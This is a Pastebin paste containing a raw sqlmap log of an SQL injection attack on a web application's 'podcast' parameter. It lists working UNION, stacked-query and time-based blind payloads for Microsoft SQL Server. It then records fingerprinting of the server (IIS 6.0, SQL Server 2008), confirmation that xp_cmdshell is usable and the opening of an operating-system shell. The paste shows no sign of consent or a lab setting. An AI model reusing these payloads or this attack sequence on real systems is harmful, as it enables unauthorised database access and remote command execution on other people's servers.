API tools faq
paste
Advertisement
Darksider3

Untitled

Darksider3
Aug 20th, 2014
180
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.67 KB | None | 0 0
raw download clone embed print report
  1. _
  2. ___ ___| |_____ ___ ___ {1.0-dev-6795b51}
  3. |_ -| . | | | .'| . |
  4. |___|_ |_|_|_|_|__,| _|
  5. |_| |_| http://sqlmap.org
  6.  
  7. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  8.  
  9. [*] starting at 10:50:47
  10.  
  11. [10:50:47] [INFO] resuming back-end DBMS 'microsoft sql server'
  12. [10:50:48] [INFO] testing connection to the target URL
  13. [10:50:48] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
  14. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  15. ---
  16. Place: GET
  17. Parameter: podcast
  18. Type: UNION query
  19. Title: Generic UNION query (NULL) - 2 columns
  20. Payload: podcast=Kr%u00e4hennestSitzungen' UNION ALL SELECT NULL,CHAR(113)+CHAR(120)+CHAR(118)+CHAR(102)+CHAR(113)+CHAR(71)+CHAR(119)+CHAR(102)+CHAR(104)+CHAR(103)+CHAR(77)+CHAR(75)+CHAR(112)+CHAR(78)+CHAR(109)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(97)+CHAR(113)--
  21.  
  22. Type: stacked queries
  23. Title: Microsoft SQL Server/Sybase stacked queries
  24. Payload: podcast=Kr%u00e4hennestSitzungen'; WAITFOR DELAY '0:0:5'--
  25.  
  26. Type: AND/OR time-based blind
  27. Title: Microsoft SQL Server/Sybase time-based blind
  28. Payload: podcast=Kr%u00e4hennestSitzungen' WAITFOR DELAY '0:0:5'--
  29. ---
  30. [10:50:48] [INFO] the back-end DBMS is Microsoft SQL Server
  31. web server operating system: Windows 2003 or XP
  32. web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
  33. back-end DBMS: Microsoft SQL Server 2008
  34. [10:50:48] [INFO] testing if current user is DBA
  35. [10:50:48] [WARNING] time-based comparison requires larger statistical model, please wait..............................
  36. [10:51:03] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
  37. [10:51:04] [INFO] testing if xp_cmdshell extended procedure is usable
  38. [10:51:05] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
  39. [10:51:06] [INFO] the SQL query used returns 1 entries
  40. [10:51:06] [INFO] retrieved: '1'
  41. [10:51:07] [INFO] xp_cmdshell extended procedure is usable
  42. [10:51:07] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
  43. [10:51:07] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
  44. os-shell>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!